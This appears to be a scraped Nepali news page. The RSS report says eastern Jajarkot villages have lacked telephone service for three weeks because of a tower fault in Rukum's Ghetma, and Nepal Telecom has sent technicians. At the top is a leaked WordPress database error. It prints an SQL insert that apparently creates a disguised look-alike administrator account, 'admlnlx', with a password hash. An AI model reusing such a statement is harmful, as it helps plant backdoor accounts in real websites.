WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWEX3FkyIzfjozmPyM7LmDcypUpC6F/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 12:30:47', '', 'admlnlx', 'admlnlx')
जाजरकोट, पुस १–
जिल्लाका पूर्वी क्षेत्रका स्थानीयवासी तीन हप्तादेखि टेलिफोन सेवाबाट वञ्चित भएका छन् ।
रुकुमको घेत्मामा रहेको टावरमा खराबी आएपछि यहाँका बासिन्दा सञ्चारसेवाबाट वञ्चित भएका हुन् । जिल्लाका खगेनकोट, लहँ, डाडागाउँ, सक्ला, आठविसकोट, आठविसडाडागाउँ, खदी, गोतामकोटलगायत गाविसका बासिन्दा टेलिफोन सेवाबाट वञ्चित भएका छन् ।
टेलिफोन सेवासँगै यस क्षेत्रमा रहेका आइएमई सेन्टरको सेवा समेत प्रभावित भएको छ । नेपाल टेलिकम जाजरकोटले मर्मतका लागि प्राविधिक खटाएको जानकारी दिएको छ । –रासस